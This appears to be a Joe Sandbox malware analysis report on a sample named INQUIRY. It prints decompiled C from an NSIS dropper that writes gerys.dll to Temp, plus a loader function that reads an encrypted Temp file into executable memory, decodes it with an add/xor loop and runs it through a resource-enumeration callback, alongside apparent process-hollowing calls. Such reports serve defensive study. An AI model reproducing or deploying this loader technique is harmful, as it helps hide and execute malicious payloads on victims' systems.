				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029E8(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E004055E5(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405578(E00405A85(0x409b68, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409b68);
					E00405A85();
				}
				E00405CE3(0x409b68);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405D7C(0x409b68);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040573D(0x409b68);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040575C(0x409b68, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404E23(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423f28;
						goto L32;
					} else {
						E00405A85(0x40a368, 0x424000);
						E00405A85(0x424000, 0x409b68);
						E00405AA7(_t75, 0x40a368, 0x409b68, "C:\Users\jones\AppData\Local\Temp\nsc48D6.tmp\gerys.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E00405A85(0x424000, 0x40a368);
						_t62 = E00405346("C:\Users\jones\AppData\Local\Temp\nsc48D6.tmp\gerys.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b68);
								_push(0xfffffffa);
								E00404E23();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404E23(0xffffffea,  *(_t85 - 8));
				 *0x423f54 =  *0x423f54 + 1;
				_t43 = E00402F01(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
				 *0x423f54 =  *0x423f54 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffee);
					} else {
						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffe9);
						lstrcatA(0x409b68,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b68);
					E00405346();
					goto L29;
				}
				goto L33;
			}

0x00401734
0x0040173b
0x00401744
0x00401747
0x0040174a
0x0040174f
0x00401757
0x00401773
0x00401759
0x00401759
0x0040175a
0x0040175a
0x00401779
0x00401783
0x00401783
0x00401787
0x0040178a
0x0040178f
0x00401791
0x00401793
0x00401798
0x00401798
0x004017a3
0x004017a3
0x004017b4
0x004017b6
0x004017b6
0x004017b7
0x004017b7
0x004017ba
0x004017bd
0x004017c0
0x004017c0
0x004017c7
0x004017d6
0x004017db
0x004017de
0x004017e1
0x00000000
0x00000000
0x004017e3
0x004017e6
0x00401840
0x00401845
0x004015a8
0x0040264e
0x0040264e
0x0040287d
0x00402880
0x00402880
0x00000000
0x004017e8
0x004017ee
0x004017f9
0x00401806
0x00401811
0x00401827
0x00401827
0x0040182a
0x00000000
0x00401830
0x00401830
0x00401831
0x0040184e
0x00402886
0x00402886
0x00402886
0x00401833
0x00401833
0x00401834
0x00401492
0x00402200
0x00402200
0x00402200
0x00401831
0x0040182a
0x00402888
0x0040288c
0x0040288c
0x0040185e
0x00401863
0x00401871
0x00401876
0x0040187c
0x00401880
0x00401882
0x0040188a
0x00401896
0x00401884
0x00401884
0x00401888
0x00000000
0x00000000
0x00401888
0x0040189f
0x004018a5
0x004018a7
0x00000000
0x004018ad
0x004018ad
0x004018b0
0x004018c8
0x004018b2
0x004018b5
0x004018be
0x004018be
0x004018cd
0x004018d2
0x004021fb
0x00000000
0x004021fb
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,xzfdi,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
CompareFileTime.KERNEL32(-00000014,?,xzfdi,xzfdi,00000000,00000000,xzfdi,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D

Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,heifsmlbdxlebvytfzg Setup,NSIS Error), ref: 00405A92

Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401761
C:\Users\user\AppData\Local\Temp\nsc48D6.tmp\gerys.dll, xrefs: 00401801, 0040181D
xzfdi, xrefs: 00401750, 00401766, 00401778, 00401789, 004017BF, 004017D5, 004017F3, 00401833, 004018B4, 004018BD, 004018C7, 004018D2
C:\Users\user\AppData\Local\Temp\nsc48D6.tmp, xrefs: 0040177E, 004017ED, 0040180B

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsc48D6.tmp$C:\Users\user\AppData\Local\Temp\nsc48D6.tmp\gerys.dll$xzfdi
API String ID: 1941528284-4273405806
Opcode ID: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
Instruction ID: c3a7f6530b99602e8ac3371ca3d410005e8cb954db153f1edc9c693d5e31c606
Opcode Fuzzy Hash: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
Instruction Fuzzy Hash: 4541AD31A00515BACB10BBB5DD86DAF3679EF45369B20433BF511B20E1D77C8A418EAE

Uniqueness

Uniqueness Score: -1.00%

Function 021A12CF Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 237
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 021A1413
GetThreadContext.KERNELBASE(?,00010007), ref: 021A1436

Strings

D, xrefs: 021A139C

Memory Dump Source

Source File: 00000001.00000002.665372685.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_21a0000_INQUIRY.jbxd

Similarity

API ID: ContextCreateProcessThread
String ID: D
API String ID: 2843130473-2746444292
Opcode ID: 8e0a9e1c2e75e26a36b0cdfcf6ac1189901bfd8e6856da1315c331a422d3e505
Instruction ID: 609b923e1378839f3afc4f8ad8ff1c90480d573974309d42306922ba6857777d
Opcode Fuzzy Hash: 8e0a9e1c2e75e26a36b0cdfcf6ac1189901bfd8e6856da1315c331a422d3e505
Instruction Fuzzy Hash: B2A1F678E40219EFDF54DFA4C990BAEBBBAEF09344F104465E51AEB250D734AA41CF10

Uniqueness

Uniqueness Score: -1.00%

Function 021A1B9B Relevance: 10.7, APIs: 7, Instructions: 160
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsW.KERNELBASE(00000000), ref: 021A1C8D
CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 021A1CB7

Memory Dump Source

Source File: 00000001.00000002.665372685.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_21a0000_INQUIRY.jbxd

Similarity

API ID: File$CreateExistsPath
String ID:
API String ID: 2955419453-0
Opcode ID: 09d735061d9a87763cc2f46a30dfb1df1471e6a71715cf91d87135949ec5cdd4
Instruction ID: d9ed0e96ef26dfe79dbe8a88d6fe9fd122fdb817cd6628124c92aa0f2eff0d94
Opcode Fuzzy Hash: 09d735061d9a87763cc2f46a30dfb1df1471e6a71715cf91d87135949ec5cdd4
Instruction Fuzzy Hash: FE512438E90208BFDF20DBE0D915BAEBBB6AF08751F208415E515FA2A0E7714A41DF04

Uniqueness

Uniqueness Score: -1.00%

Function 00402F01 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00402F01(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				intOrPtr _t51;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t51 =  *0x423ef8; // 0x5c89
					_t44 = _t31 + _t51;
					 *0x41703c = _t44;
					SetFilePointer( *0x409014, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E0040302C(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409014,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x41703c =  *0x41703c + _t57;
						_t32 = E0040302C(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409014, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x41703c =  *0x41703c + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409014, 0x413038, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413038, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x41703c =  *0x41703c + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}

0x00402f06
0x00402f10
0x00402f12
0x00402f19
0x00402f1d
0x00402f28
0x00402f28
0x00402f30
0x00402f32
0x00402f39
0x00402f55
0x00402f59
0x00403022
0x00403022
0x00000000
0x00402f68
0x00402f6b
0x00402f71
0x00402f78
0x00402f7b
0x00402f84
0x00402ff1
0x00402ff7
0x00402ff9
0x00402ff9
0x0040300b
0x0040300f
0x00000000
0x00403011
0x00403011
0x00403014
0x0040301a
0x00000000
0x0040301a
0x00402f86
0x00402f89
0x0040301d
0x0040301d
0x00402f8f
0x00402f94
0x00402f94
0x00402f9c
0x00402f9e
0x00402f9e
0x00402faf
0x00402fb3
0x00000000
0x00000000
0x00402fc7
0x00402fcf
0x00402fed
0x00403024
0x00403024
0x00402fd6
0x00402fd6
0x00402fd9
0x00402fdc
0x00402fdf
0x00402fe9
0x00000000
0x00402feb
0x00000000
0x00402feb
0x00402fe9
0x00000000
0x00402fcf
0x00000000
0x00402f94
0x00402f89
0x00402f84
0x00402f7b
0x00402f59
0x00403025
0x00403029

APIs

SetFilePointer.KERNELBASE(00409128,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128,0000B5E4), ref: 00402F28
ReadFile.KERNELBASE(00409128,00000004,0000B5E4,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128), ref: 00402F55
ReadFile.KERNELBASE(00413038,00004000,0000B5E4,00000000,00409128,?,00402EAD,000000FF,00000000,00000000,00409128,0000B5E4), ref: 00402FAF
WriteFile.KERNELBASE(00000000,00413038,0000B5E4,000000FF,00000000,?,00402EAD,000000FF,00000000,00000000,00409128,0000B5E4), ref: 00402FC7

Strings

80A, xrefs: 00402F8F

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: File$Read$PointerWrite
String ID: 80A
API String ID: 2113905535-195308239
Opcode ID: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
Instruction ID: 41b23491bffeaa1753be022b97a7ffae9df7beca0cc47644b0b6bde15745b2e9
Opcode Fuzzy Hash: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
Instruction Fuzzy Hash: 91310B31901209EFDF21CF55DE84DAE7BB8EB453A5F20403AF504E61E0D2749E41EB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040302C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0040302C(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t22;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				long _t40;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t53;

				_t35 =  *0x41703c; // 0x50207
				_t37 = _t35 -  *0x40afa8 + _a4;
				 *0x423eac = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BC5(1);
					return 0;
				}
				E004031DA( *0x41f04c);
				SetFilePointer( *0x409014,  *0x40afa8, 0, 0); // executed
				 *0x41f048 = _t37;
				 *0x417038 = 0;
				while(1) {
					L2:
					_t12 =  *0x417040; // 0x4cef1
					_t34 = 0x4000;
					_t13 = _t12 -  *0x41f04c;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031A8(0x413038, _t34); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x41f04c =  *0x41f04c + _t34;
					 *0x40afc8 = 0x413038;
					 *0x40afcc = _t34;
					while(1) {
						_t46 =  *0x423eb0; // 0x51d818
						if(_t46 != 0) {
							_t47 =  *0x423f40; // 0x0
							if(_t47 == 0) {
								_t22 =  *0x41f048; // 0x32d2
								 *0x417038 = _t22 -  *0x41703c - _a4 +  *0x40afa8;
								E00402BC5(0);
							}
						}
						 *0x40afd0 = 0x40b038;
						 *0x40afd4 = 0x8000; // executed
						_t16 = E00405E9D(0x40afb0); // executed
						if(_t16 < 0) {
							break;
						}
						_t39 =  *0x40afd0; // 0x40e30a
						_t40 = _t39 - 0x40b038;
						if(_t40 == 0) {
							__eflags =  *0x40afcc; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags = _t34;
							if(_t34 == 0) {
								break;
							}
							L17:
							_t18 =  *0x41703c; // 0x50207
							if(_t18 -  *0x40afa8 + _a4 > 0) {
								goto L2;
							}
							SetFilePointer( *0x409014, _t18, 0, 0); // executed
							goto L23;
						}
						_t21 = WriteFile( *0x409014, 0x40b038, _t40,  &_v4, 0); // executed
						if(_t21 == 0 || _t40 != _v4) {
							_push(0xfffffffe);
							L22:
							_pop(_t17);
							return _t17;
						} else {
							 *0x40afa8 =  *0x40afa8 + _t40;
							_t53 =  *0x40afcc; // 0x0
							if(_t53 != 0) {
								continue;
							}
							goto L17;
						}
					}
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}

0x00403030
0x0040303d
0x00403050
0x00403055
0x00403196
0x00403198
0x00000000
0x0040319e
0x00403061
0x00403074
0x0040307a
0x00403080
0x0040308b
0x0040308b
0x0040308b
0x00403090
0x00403095
0x0040309d
0x0040309f
0x0040309f
0x004030a8
0x004030af
0x00000000
0x00000000
0x004030b5
0x004030bb
0x004030c1
0x004030c7
0x004030c7
0x004030cd
0x004030cf
0x004030d5
0x004030d7
0x004030ed
0x004030f2
0x004030f7
0x004030d5
0x004030fd
0x00403103
0x0040310d
0x00403114
0x00000000
0x00000000
0x00403116
0x0040311c
0x0040311e
0x00403152
0x00403158
0x00000000
0x00000000
0x0040315a
0x0040315c
0x00000000
0x00000000
0x0040315e
0x0040315e
0x00403171
0x00000000
0x00000000
0x00403180
0x00000000
0x00403180
0x0040312e
0x00403136
0x0040318d
0x00403193
0x00403193
0x00000000
0x0040313e
0x0040313e
0x00403144
0x0040314a
0x00000000
0x00000000
0x00000000
0x00403150
0x00403136
0x00403191
0x00000000
0x00403191
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00403041

Part of subcall function 004031DA: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,0000B5E4), ref: 004031E8

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000), ref: 00403074
WriteFile.KERNELBASE(0040B038,0040E30A,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 0040312E
SetFilePointer.KERNELBASE(00050207,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 00403180

Strings

@, xrefs: 004030FD, 00403116
80A, xrefs: 004030A1

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: File$Pointer$CountTickWrite
String ID: @$80A
API String ID: 2146148272-3673687522
Opcode ID: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
Instruction ID: 8653c145dc750015188d6a9afa30315cb9c5a6a6900809742879fa1bd1138a56
Opcode Fuzzy Hash: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
Instruction Fuzzy Hash: 74417FB2504302AFD7109F19EE8496A3FBCF748396710813BE511B62F1C7386A559BAE

Uniqueness

Uniqueness Score: -1.00%

Function 728B1070 Relevance: 9.2, APIs: 6, Instructions: 198
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E728B1070(void* __ebx) {
				long _v8;
				void* _v12;
				long _v16;
				void* _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				char _v40;
				long _v44;
				short _v1084;
				void* _t97;
				void* _t100;
				signed int _t104;
				void* _t106;
				void* _t137;
				_Unknown_base(*)()* _t149;
				long _t187;

				_t137 = __ebx;
				_push(__ebx);
				_v40 = 0x74;
				_v38 = 0x61;
				_v36 = 0x75;
				_v34 = 0x64;
				_v32 = 0x6f;
				_v30 = 0x73;
				_v28 = 0x77;
				_v26 = 0x79;
				_v24 = 0x6f;
				_v22 = 0;
				GetTempPathW(0x103,  &_v1084);
				E728B1000( &_v1084,  &_v40);
				_t97 = CreateFileW( &_v1084, 0x80000000, 7, 0, 3, 0x80, 0); // executed
				_v20 = _t97;
				_v16 = GetFileSize(_v20, 0);
				_t100 = VirtualAlloc(0, _v16, 0x3000, 0x40); // executed
				_v12 = _t100;
				_t187 = _v16;
				ReadFile(_v20, _v12, _t187,  &_v44, 0); // executed
				_v8 = 0;
				while(_v8 < _v16) {
					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) + 0x35;
					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) - 0xac;
					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x00000072;
					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x00000090;
					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) - 0x21;
					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) - 0xaf;
					 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x000000e5;
					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
					 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x000000cb;
					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x00000061;
					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
					_t187 = _v8 + 1;
					_v8 = _t187;
				}
				_t149 = _v12;
				_t104 = EnumResourceTypesA(0, _t149, 0); // executed
				_t106 = (_t104 ^ 0x0000620a) + 0x16054;
				if(_t137 + 0xb33a != 0x12f4f) {
					_t106 = _t106 + 0x17ef8;
					_t187 = _t187 - 1;
					_t149 = _t149 + 1;
				}
				return _t106;
			}

0x728b1070
0x728b1079
0x728b107f
0x728b1088
0x728b1091
0x728b109a
0x728b10a3
0x728b10ac
0x728b10b5
0x728b10be
0x728b10c7
0x728b10cd
0x728b10dd
0x728b10ee
0x728b110f
0x728b1115
0x728b1124
0x728b1134
0x728b113a
0x728b1143
0x728b114f
0x728b1155
0x728b1167
0x728b1185
0x728b119c
0x728b11b0
0x728b11c7
0x728b11db
0x728b11ee
0x728b1201
0x728b1218
0x728b122b
0x728b1242
0x728b1255
0x728b1268
0x728b127f
0x728b1293
0x728b12a6
0x728b1161
0x728b1164
0x728b1164
0x728b12af
0x728b12b5
0x728b12c0
0x728b12d1
0x728b12d3
0x728b12d8
0x728b12d9
0x728b12d9
0x728b12fb

APIs

GetTempPathW.KERNEL32(00000103,?), ref: 728B10DD
CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 728B110F
GetFileSize.KERNEL32(?,00000000), ref: 728B111E
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 728B1134
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 728B114F
EnumResourceTypesA.KERNEL32(00000000,?,00000000), ref: 728B12B5

Memory Dump Source

Source File: 00000001.00000002.666344294.00000000728B1000.00000020.00020000.sdmp, Offset: 728B0000, based on PE: true

Associated: 00000001.00000002.666312612.00000000728B0000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.666371250.00000000728B5000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_728b0000_INQUIRY.jbxd

Similarity

API ID: File$AllocCreateEnumPathReadResourceSizeTempTypesVirtual
String ID:
API String ID: 3718768629-0
Opcode ID: 9d5e9391495947a7a2baf081d467d2066a9cf7e9ff275f305bd11e29e7ad955d
Instruction ID: 785a57d31c0dac994140d5cd600062f2d1c02fa16f51fe45d0163840fe52b830
Opcode Fuzzy Hash: 9d5e9391495947a7a2baf081d467d2066a9cf7e9ff275f305bd11e29e7ad955d
Instruction Fuzzy Hash: 48911035904148EFDB05CBA8C991BEDBBB2EF5A308F1840D8D641AB392C6766F54DB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401F51 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E00401F51(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t25;
				void* _t26;
				struct HINSTANCE__* _t29;
				CHAR* _t31;
				intOrPtr* _t32;
				void* _t33;

				_t26 = __ebx;
				asm("sbb eax, 0x423f58");
				 *(_t33 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L14:
					E00401423();
					L15:
					 *0x423f28 =  *0x423f28 +  *(_t33 - 4);
					return 0;
				}
				_t31 = E004029E8(0xfffffff0);
				 *(_t33 + 8) = E004029E8(1);
				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
					_t29 = _t18;
					if(_t29 == _t26) {
						_push(0xfffffff6);
						goto L14;
					}
					L4:
					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
					if(_t32 == _t26) {
						E00404E23(0xfffffff7,  *(_t33 + 8));
					} else {
						 *(_t33 - 4) = _t26;
						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x424000, 0x40af68, " ?B"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
							if( *_t32() != 0) {
								 *(_t33 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
						FreeLibrary(_t29);
					}
					goto L15;
				}
				_t25 = GetModuleHandleA(_t31); // executed
				_t29 = _t25;
				if(_t29 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x00401f51
0x00401f51
0x00401f56
0x00401f5d
0x0040200b
0x00402156
0x00402156
0x0040287d
0x00402880
0x0040288c
0x0040288c
0x00401f6c
0x00401f76
0x00401f79
0x00401f88
0x00401f8c
0x00401f92
0x00401f96
0x00402004
0x00000000
0x00402004
0x00401f98
0x00401fa2
0x00401fa6
0x00401fea
0x00401fa8
0x00401fab
0x00401fae
0x00401fde
0x00401fb0
0x00401fb3
0x00401fbc
0x00401fbe
0x00401fbe
0x00401fbc
0x00401fae
0x00401ff2
0x00401ff9
0x00401ff9
0x00000000
0x00401ff2
0x00401f7c
0x00401f82
0x00401f86
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C

Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
